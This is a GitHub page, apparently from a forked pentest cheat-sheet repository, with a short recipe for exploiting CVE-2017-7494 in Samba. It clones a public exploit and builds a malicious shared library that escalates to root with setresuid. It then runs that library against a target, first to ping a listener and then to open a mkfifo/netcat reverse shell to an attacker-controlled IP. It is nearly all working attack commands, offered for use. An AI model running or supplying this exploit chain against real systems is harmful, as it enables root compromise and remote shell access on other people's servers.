forked from Gimpy42/CheatSheet
-
Notifications
You must be signed in to change notification settings - Fork 2
/
cve-2107-7494
48 lines (33 loc) · 960 Bytes
/
cve-2107-7494
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
# CVE-2017-7494
git clone https://github.com/joxeankoret/CVE-2017-7494
#1 Create a new file named poc.c :
#####################################
#include <stdio.h>
#include <stdlib.h>
int samba_init_module(void)
{
setresuid(0,0,0);
system("ping -c 3 <IP>");
}
#####################################
#2 Build
gcc -o test.so -shared poc.c -fPIC
#3 Start an ICMP listener
sudo tcpdump -i <INTERFACE> icmp
#4 Exploit - If 3 pings on your listener It Worked
./cve_2017_7494.py -t <TARGET_IP> -u <USER> -P <PASSWORD> --custom=test.so
#####################################
#include <stdio.h>
#include <stdlib.h>
int samba_init_module(void)
{
setresuid(0,0,0);
system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP> <PORT> >/tmp/f");
}
#####################################
#5 Build
gcc -o test.so -shared poc.c -fPIC
#6 Start a listener
nc -lvp <PORT>
#7 Exploit
./cve_2017_7494.py -t <TARGET_IP> -u <USER> -P <PASSWORD> --custom=test.so